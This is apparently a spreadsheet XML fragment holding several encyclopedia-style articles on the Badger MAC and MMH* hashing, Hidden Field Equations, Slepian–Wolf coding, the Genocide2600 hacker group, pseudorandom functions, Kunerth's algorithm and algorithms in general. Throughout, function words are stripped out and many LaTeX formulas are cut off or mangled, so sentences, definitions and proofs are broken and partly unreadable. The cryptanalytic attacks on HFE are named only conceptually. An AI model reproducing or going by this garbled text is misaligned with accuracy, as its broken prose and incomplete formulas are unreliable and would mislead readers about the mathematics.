    <t>badger message authentication code (mac) based idea universal hashing developed boesgaard, scavenius, pedersen, christensen, zenner. constructed strengthening ∆-universal hash family using ϵ-almost strongly universal (asu) hash function family application (see below), value {\displaystyle 1/(2^{32}-5)} since badger function based universal hash function approach, conditions needed security badger universal hash functions umac. introduction badger processes message length {\displaystyle 2^{64}-1} bits returns authentication length {\displaystyle u\cdot bits, {\displaystyle 1\leq u\leq according security needs, user choose value {\displaystyle number parallel hash trees badger. choose larger values values influence security mac. algorithm uses 128-bit limited message length processed {\displaystyle 2^{64}} .the setup order badger algorithm given key, since resulting internal state saved used message processed later. hash families combined order obtain hash families. ϵ-au, ϵ-a∆u, ϵ-asu families, latter contained former. instance, family also family, also family, forth. hand, stronger family reduced weaker one, long performance gain reached. method reduce ∆-universal hash function universal hash functions described following. theorem {\displaystyle h^{\triangle ϵ-aδu hash family consider message {\displaystyle (m,m_{b})\in a\times then family consisting functions {\displaystyle h(m,m_{b})=h^{\triangle }(m)+m_{b}} ϵ-au. {\displaystyle m\neq probability {\displaystyle h(m,m_{b})=h(m',m'_{b})} since {\displaystyle h^{\triangle ϵ-a∆u family. {\displaystyle m=m'} {\displaystyle m_{b}\neq m_{b}'} probability trivially proof theorem described enh-family constructed based universal hash family (which also used umac): {\displaystyle nh_{k}(m)=\sum _{i=1}^{\frac {\ell }{2}}(k_{(2i-1)}+_{w}m_{(2i-1)})\times (k_{2i}+_{w}m_{2i})\mod 2^{2w}} where {\displaystyle +_{w}} means 'addition modulo {\displaystyle 2^{w}} {\displaystyle m_{i},k_{i}\in {\big \{}0,\ldots ,2^{w}-1{\big \}}} {\displaystyle 2^{-w}} -a∆u hash family. lemma following version {\displaystyle 2^{-w}} -a∆u: {\displaystyle nh_{k}(m)=(k_{1}+_{w}m_{1})\times (k_{2}+_{w}m_{2})\mod 2^{2w}} choosing w=32 applying theorem obtain {\displaystyle 2^{-32}} function family enh, basic building block badger mac: {\displaystyle enh_{k_{1},k_{2}}(m_{1},m_{2},m_{3},m_{4})=(m_{1}+_{32}k_{1})(m_{2}+_{32}k_{2})+_{64}m_{3}+_{64}2^{32}m_{4}} arguments 32-bits long output 64-bits. construction badger constructed using strongly universality hash family described {\displaystyle {\mathcal {h}}=h^{*}\times {\displaystyle \epsilon _{h^{*}}} universal function family used hash messages size onto fixed size {\displaystyle \epsilon _{f}} -asu function family used guarantee strong universality overall construction. used construct maximum input size function family {\displaystyle 2^{64}-1} output size bits, split bits message hash. collision probability h*-function ranges {\displaystyle 2^{-32}} 26.14 {\displaystyle 2^{-26.14}} construct strongly universal function family ∆-universal hash family mmh* transformed strongly universal hash family adding another key. steps badger there steps executed every message: processing phase finalize phase. processing phase phase, data hashed 64-bit string. core function {\displaystyle {\displaystyle {\big \{}0,1{\big \}}^{64}\times {\big \{}0,1{\big \}}^{128}\to {\big \{}0,1{\big \}}^{64}} used processing phase, hashes 128-bit string {\displaystyle m_{2}\parallel m_{1}} 64-bit string {\displaystyle h(k,m_{2},m_{1})} follows: {\displaystyle h(k,m_{2},m_{1})=(l(m_{1})+_{32}l(k))\cdot (u(m_{1})+_{32}u(k))+_{64}m_{2}\,} {\displaystyle +_{n}} means addition modulo {\displaystyle 2^{n}} given 2n-bit string l(x) means least significant bits, u(x) means significant bits. message processed using function. denote level_key [j][i] {\displaystyle k_{j}^{i}} pseudo-code processing phase follow. finalization r≠0: 0^(64-r)∥m max{1, ⌈log_2 l⌉-6} v^': divide 64-bit blocks, m_t^i∥⋯∥m_1^i even: h(k_j^i, m_t^i, m_(t-1)^i) h(k_j^i, m_2^i, m_1^i) else m_t^i∥h(k_j^i, m_(t-1)^i, m_(t-2)^i) h(k_j^i, m_2^i, m_1^i) finalize phase phase, 64-string resulting processing phase transformed desired tag. this finalization phase uses rabbit stream cipher uses setup setup taking finalization final_key[j][i] {\displaystyle k_{j}^{i}} pseudo-code finalization phase rabbitkeysetup(k) rabbitivsetup(n) =0^7∥l∥m^i divide 27-bit blocks, q^i=q_5^i∥⋯∥q_1^i =(σ_(j=1)^5 (q_j^i k_j^i))+k_6^i s^u∥⋯∥s^1 rabbitnextbit(u∙32) return notation: from pseudocode above, denotes rabbit setup(k) initializes rabbit 128-bit denotes message hashed denotes length message bits. denotes message divided blocks. given 2n-bit string l(x) u(x) respectively denoted least significant bits significant bits. performance boesgard, christensen zenner report performance badger measured pentium pentium processor. speed-optimized versions programmed assembly language inlined compiled using intel compiler. following table presents badger's properties various restricted message lengths. "memory req." denotes amount memory required store internal state including material inner state rabbit stream cipher "setup" denotes setup, "fin." denotes finalization iv-setup. (multilinear modular hashing) name stands multilinear-modular-hashing. applications multimedia example verify integrity on-line multimedia title. performance based improved support integer scalar products modern microprocessors. uses single precision scalar products basic operation. consists (modified) inner product message modulo prime {\displaystyle construction works finite field {\displaystyle f_{p}} prime integer {\displaystyle mmh* mmh* involves construction family hash functions consisting multilinear functions {\displaystyle f_{p}^{k}} positive integer {\displaystyle family mmh* functions {\displaystyle f_{p}^{k}} {\displaystyle f_{p}} defined follows. {\displaystyle \mathrm {mmh} ^{*}=\{g_{x}:f_{p}^{k}\rightarrow f_{p}|x\in f_{p}^{k}\}\,} vectors, functions {\displaystyle g_{x}} defined follows. {\displaystyle \!g_{x}(m)} {\displaystyle mx\mod {\displaystyle \sum _{i=1}^{n}m_{i}\,x_{i}\mod case mac, {\displaystyle message {\displaystyle {\displaystyle m=(m_{1},\ldots ,m_{k})} {\displaystyle x=(x_{1},\ldots ,x_{k}),x_{i},m_{i}\in \!f_{p}} mmh* satisfy security requirements mac, enabling communicate authenticated way. they secret {\displaystyle charles listens conversation wants change message message pass message ana. message {\displaystyle ana's message {\displaystyle differ least (e.g. {\displaystyle m_{1}\neq m'_{1}} assume charles knows function form {\displaystyle g_{x}(m)} knows ana's message {\displaystyle know probability charles change message send message explained following theorem. theorem 1:the family mmh* ∆-universal. proof: take {\displaystyle a\in f_{p}} {\displaystyle m,m'} different messages. assume without loss generality {\displaystyle m_{1}\neq m'_{1}} then choice {\displaystyle x_{2},x_{3},\ldots ,x_{s}} {\displaystyle {\begin{aligned}{\pr }_{x_{1}}[g_{x}(m)-g_{x}(m')\equiv a\mod p]&amp;={\pr }_{x_{1}}[(m_{1}x_{1}+m_{2}x_{2}+\cdots +m_{k}x_{k})-(m'_{1}x_{1}+m'_{2}x_{2}+\cdots +m'_{k}x_{k})\equiv a\mod p]\\&amp;={\pr }_{x_{1}}[(m_{1}-m'_{1})x_{1}+(m_{2}-m'_{2})x_{2}+\cdots +(m_{k}-m'_{k})x_{k}]\equiv a\mod p]\\&amp;={\pr }_{x_{1}}[(m_{1}-m'_{1})x_{1}+\textstyle \sum _{k=2}^{s}(m_{k}-m'_{k})x_{k}\equiv a\mod p]\\&amp;={\pr }_{x_{1}}[(m_{1}-m'_{1})x_{1}\equiv a-\textstyle \sum _{k=2}^{s}(m_{k}-m'_{k})x_{k}\mod p]\\&amp;={\frac {1}{p}}\end{aligned}}} explain theorem above, take {\displaystyle f_{p}} {\displaystyle prime represent field {\displaystyle f_{p}=\underbrace {{\big \{}0,1,\ldots ,p-1{\big \}}} _{p}} takes element {\displaystyle f_{p}} {\displaystyle 0\in f_{p}} probability {\displaystyle x_{1}=0} {\displaystyle {\pr }_{x_{1}\in \!{f_{p}}}(x_{1}=0)={\frac {1}{p}}} actually needs compute {\displaystyle {\pr }_{(x_{1},\ldots ,x_{k})\in \!{f_{p}^{k}}}(g_{x}(m)\equiv g_{x}(m')\mod but, {\displaystyle {\begin{aligned}{\pr }_{(x_{1},\ldots ,x_{k})\in \!{f_{p}^{k}}}(g_{x}(m)\equiv g_{x}(m')\mod p)&amp;=\sum _{(x_{2},\ldots ,x_{k})\in \!{f_{p}^{k-1}}}{\pr }_{(x_{2}^{'}\cdots ,x_{k}^{'})\in \!{f_{p}^{k-1}}}({x_{2}=x_{2}^{'}},\ldots ,{x_{k}=x_{k}^{'}})\cdot {\pr }_{x_{1}\in \!f_{p}}(g_{x}(m)\equiv g_{x}(m')\mod p)\\&amp;=\sum _{(x_{2},\ldots ,x_{k})\in \!{f_{p}^{k-1}}}{\frac {1}{p^{k-1}}}\cdot {\frac {1}{p}}\\&amp;=p^{k-1}\cdot {\frac {1}{p^{k-1}}}\cdot {\frac {1}{p}}\\&amp;={\frac {1}{p}}\end{aligned}}} from proof above, {\displaystyle {\frac {1}{p}}} collision probability attacker round, average {\displaystyle verification queries suffice message accepted. reduce collision probability, necessary choose large concatenate {\displaystyle macs using {\displaystyle independent keys collision probability] becomes {\displaystyle {\frac {1}{p^{n}}}} case number keys increased factor {\displaystyle output also increased {\displaystyle mmh*32 halevi krawczyk construct variant called {\displaystyle mmh_{32}^{*}} construction works 32-bit integers prime integer {\displaystyle p=2^{32}+15} actually prime chosen prime satisfies {\displaystyle 2^{32}&lt;p&lt;2^{32}+2^{16}} this idea adopted suggestion carter wegman primes {\displaystyle 2^{16}+1} {\displaystyle 2^{31}-1} {\displaystyle \mathrm {mmh} _{32}^{*}} defined follows: {\displaystyle mmh_{32}^{*}={\big \{}g_{x}({\big \{}0,1{\big \}}^{32})^{k}{\big \}}\to f_{p},} {\displaystyle {\big \{}0,1{\big \}}^{32}} means {\displaystyle {\big \{}0,1,\ldots ,2^{32}-1{\big \}}} (i.e., binary representation) functions {\displaystyle g_{x}} defined follows. {\displaystyle {\begin{aligned}g_{x}(m)&amp;{\overset {\underset {\mathrm {def} }{}}{=}}m\cdot x\mod (2^{32}+15)\\&amp;=\textstyle \sum _{i=1}^{k}m_{i}\cdot x_{i}\mod (2^{32}+15)\end{aligned}}} {\displaystyle x=(x_{1},\ldots ,x_{k})} {\displaystyle m=(m,\ldots ,m_{k})} theorem collision probability {\displaystyle 2^{-32}} family {\displaystyle mmh_{32}^{*}} defined ϵ-almost universal {\displaystyle 2^{-32}} value value describes length message vectors several effects: since costly modular reduction multiply operations increasing decrease speed. since consist 32-bit integers increasing results longer key. probability breaking system {\displaystyle 1/p} {\displaystyle p\approx 2^{k}} increasing makes system harder break. performance below timing results various implementations 1997, designed halevi krawczyk. powerpc risc machine running aixa pentium-pro machine running windows pentium-pro machine running linux also umac vmac poly1305-aes references</t>
  </si>
  <si>
    <t>Hidden Field Equations</t>
  </si>
  <si>
    <t>hidden fields equations (hfe), also known trapdoor function, public cryptosystem introduced eurocrypt 1996 proposed french) jacques patarin following idea matsumoto imai system. based polynomials finite fields {\displaystyle \mathbb _{q}} different size disguise relationship private public key. fact family consists basic combinatorial versions hfe. family cryptosystems based hardness problem finding solutions system multivariate quadratic equations (the so-called problem) since uses private affine transformations hide extension field private polynomials. hidden field equations also used construct digital signature schemes, e.g. quartz sflash. mathematical background central notions understand hidden field equations work extension fields {\displaystyle \mathbb _{q^{n}}} {\displaystyle \mathbb _{q^{m}}} base field {\displaystyle \mathbb _{q}} interpret system {\displaystyle multivariate polynomials {\displaystyle variables {\displaystyle \mathbb _{q}} function {\displaystyle \mathbb _{q^{n}}\to \mathbb _{q^{m}}} using suitable basis {\displaystyle \mathbb _{q^{n}}} {\displaystyle \mathbb _{q}} almost applications polynomials quadratic, i.e. degree start simplest kind polynomials, namely monomials, show lead quadratic systems equations. consider finite field {\displaystyle \mathbb _{q}} {\displaystyle power extension field {\displaystyle {\displaystyle 0&lt;h&lt;q^{n}} {\displaystyle h=q^{\theta }+1} {\displaystyle \theta {\displaystyle (h,q^{n}-1)=1} condition {\displaystyle (h,q^{n}-1)=1} equivalent requiring {\displaystyle u\to u^{h}} {\displaystyle inverse {\displaystyle u\to u^{h'}} {\displaystyle multiplicative inverse {\displaystyle {\bmod {q}}^{n}-1} take random element {\displaystyle u\in \mathbb _{q^{n}}} define {\displaystyle w\in \mathbb _{q^{n}}} {\displaystyle w=u^{h}=u^{q^{\theta }}u\ (1)} {\displaystyle \beta _{1},...,\beta _{n}} basis {\displaystyle {\displaystyle \mathbb _{q}} vector space. represent {\displaystyle respect basis {\displaystyle u=(u_{1},...,u_{n})} {\displaystyle w=(w_{1},...,w_{n})} {\displaystyle a^{(k)}={a_{ij}^{(k)}}} matrix linear transformation {\displaystyle u\to u^{q^{k}}} respect basis {\displaystyle \beta _{1},...,\beta _{n}} i.e. {\displaystyle \beta _{i}^{q^{k}}=\sum _{j=1}^{n}a_{ij}^{k}\beta _{j},\ a_{ij}^{k}\in \mathbb _{q}} {\displaystyle 1\leq i,k\leq additionally, write products basis elements terms basis, i.e.: {\displaystyle \beta _{i}\beta _{j}=\sum _{l=1}^{n}m_{ijl}\beta _{l},\ m_{ijl}\in \mathbb _{q}} {\displaystyle 1\leq i,j\leq system {\displaystyle equations explicit {\displaystyle w_{i}} quadratic {\displaystyle u_{j}} obtained expanding equating zero coefficients {\displaystyle \beta _{i}} choose secret affine transformations {\displaystyle {\displaystyle i.e. invertible {\displaystyle n\times matrices {\displaystyle m_{s}=\{s_{ij}\}} {\displaystyle m_{t}=\{t_{ij}\}} entries {\displaystyle \mathbb _{q}} vectors {\displaystyle v_{s}} {\displaystyle v_{t}} length {\displaystyle {\displaystyle \mathbb _{q}} define {\displaystyle {\displaystyle via: {\displaystyle u=sx=m_{s}x+v_{s}\ w=ty=m_{t}y+v_{t}\ (2)} using affine relations replace {\displaystyle u_{j},w_{i}} {\displaystyle x_{k},y_{l}} system {\displaystyle equations linear {\displaystyle y_{l}} degree {\displaystyle x_{k}} applying linear algebra give {\displaystyle explicit equations, {\displaystyle y_{l}} polynomials degree {\displaystyle x_{k}} multivariate cryptosystem basic idea family using multivariate cryptosystem build secret starting polynomial {\displaystyle unknown {\displaystyle finite field {\displaystyle \mathbb _{q^{n}}} (normally value {\displaystyle q=2} used). this polynomial easily inverted {\displaystyle \mathbb _{q^{n}}} i.e. feasible find solutions equation {\displaystyle p(x)=y} solution exist. secret transformation either decryption and/or signature based inversion. explained {\displaystyle identified system {\displaystyle equations {\displaystyle (p_{1},...,p_{n})} using fixed basis. build cryptosystem polynomial {\displaystyle (p_{1},...,p_{n})} must transformed public information hides original structure prevents inversion. this done viewing finite fields {\displaystyle \mathbb _{q^{n}}} vector space {\displaystyle \mathbb _{q}} choosing linear affine transformations {\displaystyle {\displaystyle triplet {\displaystyle (s,p,t)} constitute private key. private polynomial {\displaystyle defined {\displaystyle \mathbb _{q^{n}}} public {\displaystyle (p_{1},...,p_{n})} below diagram mq-trapdoor {\displaystyle (s,p,t)} input secret secret secret output {\displaystyle {\text{input}}x\to x=(x_{1},...,x_{n}){\overset {{\text{secret}}:s}{\to }}x'{\overset {{\text{secret}}:p}{\to }}y'{\overset {{\text{secret}}:t}{\to }}{\text{output}}y} polynomial private polynomial {\displaystyle degree {\displaystyle {\displaystyle \mathbb _{q^{n}}} element {\displaystyle \mathbb _{q^{n}}[x]} terms polynomial {\displaystyle quadratic terms {\displaystyle \mathbb _{q}} keep public polynomial small. case {\displaystyle consists monomials form {\displaystyle x^{q^{s_{i}}+q^{t_{i}}}} i.e. powers {\displaystyle exponent basic version hfe, i.e. {\displaystyle chosen {\displaystyle p(x)=\sum c_{i}x^{q^{s_{i}}+q^{t_{i}}}} degree {\displaystyle polynomial also known security parameter bigger value better security since resulting quadratic equations resembles randomly chosen quadratic equations. side large {\displaystyle slows deciphering. since {\displaystyle polynomial degree {\displaystyle inverse {\displaystyle denoted {\displaystyle p^{-1}} computed {\displaystyle d^{2}(\ln d)^{o(1)}n^{2}\mathbb _{q}} operations. encryption decryption public given {\displaystyle multivariate polynomials {\displaystyle (p_{1},...,p_{n})} {\displaystyle \mathbb _{q}} thus necessary transfer message {\displaystyle {\displaystyle \mathbb _{q^{n}}\to \mathbb _{q}^{n}} order encrypt i.e. assume {\displaystyle vector {\displaystyle (x_{1},...,x_{n})\in \mathbb _{q}^{n}} encrypt message {\displaystyle evaluate {\displaystyle p_{i}} {\displaystyle (x_{1},...,x_{n})} ciphertext {\displaystyle (p_{1}(x_{1},...,x_{n}),p_{2}(x_{1},...,x_{n}),...,p_{n}(x_{1},...,x_{n}))\in \mathbb _{q}^{n}} understand decryption express encryption terms {\displaystyle s,t,p} note available sender. evaluating {\displaystyle p_{i}} message first apply {\displaystyle resulting {\displaystyle point {\displaystyle transferred {\displaystyle \mathbb _{q^{n}}\to \mathbb _{q^{n}}} apply private polynomial {\displaystyle {\displaystyle \mathbb _{q^{n}}} result denoted {\displaystyle y'\in \mathbb _{q^{n}}} once again, {\displaystyle transferred vector {\displaystyle (y_{1}',...,y_{n}')} transformation {\displaystyle applied final output {\displaystyle y\in \mathbb _{q^{n}}} produced {\displaystyle (y_{1},...,y_{n})\in \mathbb _{q}^{n}} decrypt {\displaystyle steps done reverse order. this possible private {\displaystyle (s,p,t)} known. crucial step deciphering inversion {\displaystyle {\displaystyle rather computations solution {\displaystyle p(x')=y'} since {\displaystyle necessary bijection, find solution inversion (there exist different solutions {\displaystyle x'=(x_{1}',...,x_{d}')\in \mathbb _{q^{n}}} since {\displaystyle polynomial degree redundancy denoted {\displaystyle added first step message {\displaystyle order select right {\displaystyle solutions {\displaystyle diagram shows basic encryption. secret secret secret {\displaystyle m{\overset {+r}{\to }}x{\overset {{\text{secret}}:s}{\to }}x'{\overset {{\text{secret}}:p}{\to }}y'{\overset {{\text{secret}}:t}{\to }}y} variations hidden field equations four basic variations namely +,-,v possible combine various way. basic principle following: sign consists linearity mixing public equations random equations. sign shamir intends remove redundancy public equations. sign consists fixing {\displaystyle input variables public key. sign defined construction sometimes quite complex inverse function found variables called vinegar variables fixed. this idea jacques patarin.the operations preserve extent trapdoor solvability function. hfe- hfev useful signature schemes prevent slowing signature generation also enhance overall security whereas encryption hfe- hfev lead rather slow decryption process neither many equations removed (hfe-) many variables added (hfev). both hfe- hfev used obtain quartz. encryption, situation better hfe+ since decryption process takes amount time, however public equations variables. attacks there famous attacks hfe: recover private (shamir-kipnis): point attack recover private sparse univariate polynomials extension field {\displaystyle \mathbb _{q^{n}}} attack works basic fails variations. fast gröbner bases (faugère): idea faugère's attacks fast algorithm compute gröbner basis system polynomial equations. faugère broke challenge hours 2002, 2003 faugère joux worked together security hfe. references nicolas courtois, magnus daum patrick felke, security hfe, hfev- quartz andrey sidorenko, hidden field equations, eidma seminar 2004 technische universiteit eindhoven desmet, public cryptography-pkc 2003, isbn 3-540-00324-x</t>
  </si>
  <si>
    <t>Slepian–Wolf coding</t>
  </si>
  <si>
    <t>information theory communication, slepian–wolf coding, also known slepian–wolf bound, result distributed source coding discovered david slepian jack wolf 1973. method theoretically coding lossless compressed correlated sources. problem setup distributed coding coding two, case, dependent sources separate encoders joint decoder. given statistically dependent i.i.d. finite-alphabet random sequences {\displaystyle x^{n}} {\displaystyle y^{n}} slepian–wolf theorem gives theoretical bound lossless coding rate distributed coding sources. theorem bound lossless coding rates shown below: {\displaystyle r_{x}\geq h(x|y),\,} {\displaystyle r_{y}\geq h(y|x),\,} {\displaystyle r_{x}+r_{y}\geq h(x,y).\,} encoder decoder sources independent, lowest rate achieve lossless compression {\displaystyle h(x)} {\displaystyle h(y)} {\displaystyle {\displaystyle respectively, {\displaystyle h(x)} {\displaystyle h(y)} entropies {\displaystyle {\displaystyle however, joint decoding, vanishing error probability long sequences accepted, slepian–wolf theorem shows much better compression rate achieved. long total rate {\displaystyle {\displaystyle larger joint entropy {\displaystyle h(x,y)} none sources encoded rate smaller entropy, distributed coding achieve arbitrarily small error probability long sequences.a special case distributed coding compression decoder side information, source {\displaystyle available decoder side accessible encoder side. this treated condition {\displaystyle r_{y}=h(y)} already used encode {\displaystyle intend {\displaystyle h(x|y)} encode {\displaystyle words, isolated sources compress data efficiently communicating other. whole system operating asymmetric (compression rate sources asymmetric).this bound extended case correlated sources thomas cover 1975, similar results obtained 1976 aaron wyner jacob regard lossy coding joint gaussian sources. also data compression data synchronization synchronization (computer science) discus timeline information theory references sources external links</t>
  </si>
  <si>
    <t>Genocide2600</t>
  </si>
  <si>
    <t>genocide2600 hacker group collective active 1980s early 2000. group's name explained statement designed show people become desensitized shocked horrors seen throughout world murder atrocities. hope founder "genocide" name word genocide would cause people flinch experience sort revulsion therefore, wake little. history genocide2600 group's origin started approximately 1987 group taking part telephone phreaking, writing rewriting methodologies taking advantage telephony systems trading information bulletin board systems. group diversified became involved known social engineering early 1990s formally computer hacking mid-1990s. because varied schools thought members genocide2600 group took part publications released members found quite scattered subject material. group gained notoriety focusing varied talents members combat child pornography sites aol. several members genocide2600 group joined number hackers mid-1990s (including rsnake revelation) interested combat internet child pornography formed group "ehap" ethical hackers against pedophilia worked various enforcement agencies combat child pornography. aside battle child pornography, genocide2600 group also supported various ideas software applications including snort packetstorm hosting sites infancy. genocide2600 group point could longer host packetstorm server physically relocating across country, popularity site, temporarily moved. tattooman managed find home harvard's servers resulting huge "hacker crossfire". later, site purchased brought "kroll-o'gara". members genocide2600 group 2011 exactly happened members genocide2600 group known. those members still contact desiring public include: travis ogden "genocide", william marquette "doxavg", williams "tattooman", forster "the weasel", andrew schlotfeldt "astroboy", alex richardson "overlord", aronow "godpunk" cody ogden "wizdom".other members included (legal names withheld): stranger, loki, dequeue, speedygrl, spikeman, s7urm, bernz, revelation, p4nd0r4, jigz, alexu, mantis. references external links genocide2600 group homepage genocide's personal homepage wizdom's personal homepage doxavg's computersecuritynow</t>
  </si>
  <si>
    <t>Pseudorandom function family</t>
  </si>
  <si>
    <t>cryptography, pseudorandom function family, abbreviated prf, collection efficiently-computable functions emulate random oracle following way: efficient algorithm distinguish (with significant advantage) function chosen randomly family random oracle function whose outputs fixed completely random). pseudorandom functions vital tools construction cryptographic primitives, especially secure encryption schemes. pseudorandom functions confused pseudorandom generators (prgs). guarantee single output appears random input chosen random. hand, guarantee outputs appear random, regardless corresponding inputs chosen, long function drawn random family. pseudorandom function family constructed pseudorandom generator, using, example, "ggm" construction given goldreich, goldwasser, micali. while practice, block ciphers used instances pseudorandom function needed, not, general, constitute pseudorandom function family, block ciphers defined limited numbers input sizes. motivations random functions efficient (i.e. computable polynomial time), deterministic function maps distinct sets (domain range) looks like truly random function. essentially, truly random function would composed lookup table filled uniformly distributed random entries. however, practice, given input string domain hidden random seed runs multiple times input string seed, always returning value. nonetheless, given arbitrary input string, output looks random seed taken uniform distribution. considered good behavior indistinguishable truly random function. therefore, given output either truly random function prf, efficient method correctly determine whether output produced truly random function prf. formal definition family functions, {\displaystyle f_{s}:\left\{0,1\right\}^{\lambda (\left|s\right|)}\rightarrow \left\{0,1\right\}^{\lambda (\left|s\right|)}} {\displaystyle s\in \left\{0,1\right\}^{*}} {\displaystyle \lambda :\mathbb \rightarrow \mathbb pseudorandom following conditions satisfied: given {\displaystyle {\displaystyle {\displaystyle \left\vert x\right\vert =\lambda (\left\vert s\right\vert always exists polynomial-time algorithm compute {\displaystyle f_{s}(x)} {\displaystyle f_{n}} distribution functions {\displaystyle f_{s}} {\displaystyle uniformly distributed {\displaystyle \{0,1\}^{n}} {\displaystyle rf_{n}} denote uniform distribution functions {\displaystyle \{0,1\}^{n}} {\displaystyle \{0,1\}^{n}} then require {\displaystyle f_{n}} {\displaystyle rf_{n}} computationally indistinguishable, security parameter. that adversary query oracle function sampled either {\displaystyle f_{n}} {\displaystyle rf_{n}} advantage tell apart kind oracle given negligible. oblivious pseudorandom functions oblivious pseudorandom function, abbreviated oprf, information concealed parties involved prf. that alice cryptographically hashes secret value, cryptographically blinds hash produce message sends bob, mixes secret value gives result back alice, unblinds final output, able either alice's secret value final output, alice able bob's secret input, alice sees final output inputs alice's secret bob's secret. this enables transactions sensitive cryptographic information secure even untrusted parties. oprf used implementations password-authenticated agreement.an oprf used password monitor functionality microsoft edge. application prfs used for: dynamic perfect hashing; even adversary change key-distribution depending values hashing function assigned previous keys, adversary force collisions. constructing deterministic, memoryless authentication schemes (message authentication code based) provably secure chosen message attack. distributing unforgable numbers, locally verified stations contain small amount storage. constructing identification friend systems. also pseudorandom permutation notes references goldreich, oded (2001). foundations cryptography: basic tools. cambridge: cambridge university press. isbn 978-0-511-54689-1. pass, rafael, course cryptography (pdf), retrieved december 2015</t>
  </si>
  <si>
    <t>Kunerth's algorithm</t>
  </si>
  <si>
    <t>kunerth's algorithm algorithm determine modular square root number. algorithm require factorization modulus, modular operation often easy cipher prime. find {\displaystyle y^{2}{\bmod {n}}} following steps find modular square root {\displaystyle r\equiv {\sqrt {\pm n}}{\bmod {(y^{2}{\bmod {n}})}}} this step quite easy, matter original modulus {\displaystyle y^{2}{\bmod {n}}} prime.2) solve quadratic equation associated modular square root {\displaystyle w^{2}=a*z^{2}+b*z+c} most kunerth's examples original paper solve equation natural square thus setting zero. expand following equation obtain quadratic {\displaystyle y^{2}{\bmod {n}}\equiv {\displaystyle ((b*z+r)^{2}\pm n)/b==w^{2}} always ensure quadratic solved adjusting term(modulus) equation. thus {\displaystyle ((b*z+r)^{2}+(b*f+n))/b==w^{2}} ensure quadratic {\displaystyle a*z^{2}+d*z+c+f} adjust ensure square. quite large modula, {\displaystyle {\sqrt {67}}{\bmod {67*f+rsa260}}} square roots taken quickly method. parameters polynomial expansion quite fluid, {\displaystyle ((67z+r)^{2}+x*rsa260)/(y*67)} done, instance. quite easy {\displaystyle (r^{2}+x*rsa260)/(y*67)} square. modular square root {\displaystyle {\sqrt {y*67}}{\bmod {rsa260}}} taken way.3) having solved associated quadratic equation variables quadratic natural square).4) solve variables, alpha beta following equationalpha beta )please note modular operation alpha beta could many paired answers.5) obtain value factorization following polynomial. {\displaystyle alpha^{2}*x^{2}+(2*alpha*beta-n)x+(beta^{2}-(y^{2}{\bmod {n}}))} obtaining answer like (-37 x)6) obtain modular square root equation. remember term zero. thus would 37/9 -1/25. {\displaystyle y\equiv alpha*x+beta{\bmod {n}}} hard step solving quadratic equation, done algorithm quickly finds modular square root without much computation. example obtain {\displaystyle {\sqrt {41}}{\bmod {856}},} first obtain {\displaystyle {\sqrt {-856}}{\bmod {41}}\equiv 13.} then expand following polynomial {\displaystyle ((41z+13)^{2}+856)/41==w^{2}} {\displaystyle 25+26z+41z^{2}==5^{2}} since, case term quadratic natural square {\displaystyle w=5} {\displaystyle w=5} {\displaystyle v=13} value {\displaystyle v=41*z+13} )solve alpha beta following equation involving valpha beta)getting answer alpha=15 beta (there many paired answers equation)then factor following polynomial {\displaystyle alpha^{2}x^{2}+(2*alpha*beta-856)x+(beta^{2}-41)} obtaining {\displaystyle (-37+9x)(1+25x)} then obtain modular square root {\displaystyle 15*(37*9^{-1})+(-2){\bmod {856}}\equiv 345} verify {\displaystyle 345^{2}{\bmod {856}}\equiv case {\displaystyle {\sqrt {-856}}{\bmod {41}}} answer {\displaystyle r\equiv {\sqrt {-856}}{\bmod {(b*856+41)}}} used instead. also methods computing square roots adolf kunerth, "sitzungsberichte. academie wissenschaften" ,ii, 1877, 7-58 adolf kunerth, "sitzungsberichte. academie wissenschaften" 1880, 342-375 references</t>
  </si>
  <si>
    <t>Algorithms</t>
  </si>
  <si>
    <t>mathematics computer science, algorithm (listen)) finite sequence rigorous instructions, typically used solve class specific problems perform computation. algorithms used specifications performing calculations data processing. making artificial intelligence, algorithms perform automated deductions (referred automated reasoning) mathematical logical tests divert code execution various routes (referred automated decision-making). using human characteristics descriptors machines metaphorical ways already practiced alan turing terms "memory", "search" "stimulus".in contrast, heuristic approach problem solving fully specified guarantee correct optimal results, especially problem domains well-defined correct optimal result.as effective method, algorithm expressed within finite amount space time, well-defined formal language calculating function. starting initial state initial input (perhaps empty), instructions describe computation that, executed, proceeds finite number well-defined successive states, eventually producing "output" terminating final ending state. transition state next necessarily deterministic; algorithms, known randomized algorithms, incorporate random input. history concept algorithm existed since antiquity. arithmetic algorithms, division algorithm, used ancient babylonian mathematicians 2500 egyptian mathematicians 1550 greek mathematicians later used algorithms sieve eratosthenes finding prime numbers, euclidean algorithm finding greatest common divisor numbers. arabic mathematicians al-kindi century used cryptographic algorithms code-breaking, based frequency analysis.the word algorithm derived name 9th-century persian mathematician muḥammad mūsā al-khwārizmī, whose nisba (identifying khwarazm) latinized algoritmi (arabized persian الخوارزمی 780–850).muḥammad mūsā al-khwārizmī mathematician, astronomer, geographer, scholar house wisdom baghdad, whose name means 'the native khwarazm', region part greater iran uzbekistan. about 825, al-khwarizmi wrote arabic language treatise hindu–arabic numeral system, translated latin 12th century. manuscript starts phrase dixit algorizmi ('thus spake al-khwarizmi'), "algorizmi" translator's latinization al-khwarizmi's name. al-khwarizmi widely read mathematician europe late middle ages, primarily another books, algebra. late medieval latin, algorismus, english 'algorism', corruption name, simply meant "decimal number system". 15th century, influence greek word ἀριθμός (arithmos), 'number' (cf. 'arithmetic'), latin word altered algorithmus, corresponding english term 'algorithm' first attested 17th century; modern sense introduced 19th century.indian mathematics predominantly algorithmic. algorithms representative indian mathematical tradition range ancient śulbasūtrās medieval texts kerala school.in english, word algorithm first used 1230 chaucer 1391. english adopted french term, late 19th century "algorithm" took meaning modern english.another early word 1240, manual titled carmen algorismo composed alexandre villedieu. begins with: haec algorismus praesens dicitur, talibus indorum fruimur quinque figuris. translates algorism present indian figures, number times five. poem hundred lines long summarizes calculating styled indian dice (tali indorum), hindu numerals.a partial formalization modern concept algorithm began attempts solve entscheidungsproblem (decision problem) posed david hilbert 1928. later formalizations framed attempts define "effective calculability" "effective method". those formalizations included gödel–herbrand–kleene recursive functions 1930, 1934 1935, alonzo church's lambda calculus 1936, emil post's formulation 1936, alan turing's turing machines 1936–37 1939. informal definition informal definition could rules precisely defines sequence operations", would include computer programs (including programs perform numeric calculations), (for example) prescribed bureaucratic procedure cook-book recipe.in general, program algorithm stops eventually—even though infinite loops sometimes prove desirable. prototypical example algorithm euclidean algorithm, used determine maximum common divisor integers; example (there others) described flowchart example later section. boolos, jeffrey 1974, 1999 offer informal meaning word "algorithm" following quotation: human write fast enough, long 